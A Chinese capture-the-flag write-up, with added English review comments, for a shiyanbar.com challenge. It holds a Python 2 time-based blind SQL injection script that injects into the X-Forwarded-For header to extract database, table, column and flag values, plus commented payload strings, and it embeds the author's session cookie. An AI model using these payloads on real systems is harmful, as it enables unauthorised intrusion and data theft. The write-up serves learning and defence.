根据提示:
我要把攻击我的人都记录db中去!
记录了我们的 IP,由此猜测注入点应该在 HTTP 头中(HTTP 头注入),而获取 IP 则是通过头中的 X-FORWARDED-FOR 来获取的
相关知识:http://www.cnblogs.com/softidea/p/5325079.html
由此需要写代码来完成相关操作
# Time-based blind SQL-injection proof-of-concept from a CTF write-up, collapsed onto a
# single line by extraction and written for Python 2 (`print` statement). The curly
# quotes inside the SQL strings are an extraction artefact, not valid Python quotes.
#
# What it demonstrates, seen from the defender's side: the target takes the client
# address from the attacker-controlled X-FORWARDED-FOR request header and interpolates
# it into a SQL statement without parameterisation, so a header value carrying a quote
# and a conditional `sleep(5)` turns response latency into a one-bit oracle. request()
# maps a requests timeout (4 s, i.e. shorter than the 5 s sleep) to 1 and any other
# outcome to 0; violent() walks each character position against a 65-symbol alphabet.
# Mitigations: bind the value with a parameterised query; treat X-Forwarded-For as
# untrusted input (only a trusted reverse proxy should set it, and the stored value
# should be validated as an IP address first); and alert on bursts of requests whose
# X-Forwarded-For content is not an address or whose latency clusters around ~5 s.
#
# NOTE(review): the bare `except:` in request() reports every failure (DNS error,
# connection reset, KeyboardInterrupt) as a "true" oracle result, which is presumably
# why the author says the run may need repeating. `"ccept-Encoding"` is a typo for
# Accept-Encoding.
# NOTE(review): the hard-coded Cookie header embeds the author's own PHPSESSID and
# analytics cookies; session identifiers should never be published in a write-up.
#!/usr/bin/python #coding=utf-8 #Author = One import requests def request(sql): url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php" payload = { "Host":"ctf5.shiyanbar.com", "X-FORWARDED-FOR":sql, "User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0", "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "ccept-Encoding":"gzip, deflate", "Cookie":"Hm_lvt_34d6f7353ab0915a4c582e4516dffbc3=1497371533,1499754629; Hm_cv_34d6f7353ab0915a4c582e4516dffbc3=1*visitor*80971%2CnickName%3AOne; _ga=GA1.2.1839998664.1499754828; _gid=GA1.2.1200124816.1499754828; Hm_lpvt_34d6f7353ab0915a4c582e4516dffbc3=1499764932; PHPSESSID=10gs5psspg8sh6d0unein5uak0", "Connection":"keep-alive" } try: requests.get(url,headers=payload,timeout=4) return 0 except: return 1 def violent(strs): keys = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXY}Z{_" n = 0 key = "" for i in range(1,35): for j in keys: sql = "127.0.0.1‘ and case when substring(("+strs+") from "+str(i)+" for 1)=‘"+j+"‘ then sleep(5) else 0 end and ‘1‘=‘1" result = request(sql) if(result == 1): key += j break else: n += 1 if(n == 65): return key break else: n = 0 def main(): #猜解数据库名 dbn_sql = "select database()" db_name = violent(dbn_sql) print "数据库名:"+db_name #猜解数据库中表名 #tbn_sql1 = "select table_name from information_schema.tables where table_schema = ‘Web4‘ order by table_name asc limit 1" #print violent(tbn_sql1) tbn_sql2 = "select table_name from information_schema.tables where table_schema = ‘"+db_name+"‘ order by table_name desc limit 1" tb_name = violent(tbn_sql2) print "需要查看的表名:"+tb_name #猜解表中字段名 cln_sql = "select column_name from information_schema.columns where table_name = ‘"+tb_name+"‘" col_name = violent(cln_sql) print "表中的字段名:"+col_name #猜解记录 key_sql = "select "+col_name+" from "+tb_name print violent(key_sql) if __name__ == ‘__main__‘: main() #判断数据库长度127.0.0.1‘ and case when length(database())=4 
then sleep(5) else 1 end and ‘1‘=‘1 #判断数据库名字127.0.0.1‘ and case when (ascii(substring((select database()) from 1 for 1))&1)=1 then sleep(5) else 1 end and ‘1‘=‘1 #判断数据表数量127.0.0.1‘ and case when (select count(table_name) from information_schema.tables where table_schema = ‘web4‘)=4 then sleep(5) else 1 end and ‘1‘=‘1 #判断数据库表名长度127.0.0.1‘ and case when (select length(table_name) from information_schema.tables where table_schema = ‘Web4‘ order by table_name asc limit 1) #判断数据库表名127.0.0.1‘ and case when (select table_name from information_schema.tables where table_schema = ‘Web4‘ order by table_name asc limit 1) #判断表中字段数量127.0.0.1‘ and case when (select count(column_name) from information_schema.columns where table_name = ‘flag‘) #判断表中字段名长度127.0.0.1‘ and case when (select length(column_name) from information_schema.columns where table_name = ‘flag‘) #判断表中字段名127.0.0.1‘ and case when (select column_name from information_schema.columns where table_name = ‘flag‘) #判断记录数量127.0.0.1‘ and case when (select count(flag) from flag) #判断记录长度127.0.0.1‘ and case when (select length(flag) from flag) 代码写的比较菜...也是看了别人写的一些write up参考的,跑出来的结果要放在ctf{}中,如果不对,多跑几遍 本人也是初学者,有什么错误的地方,希望大家指出,谢谢!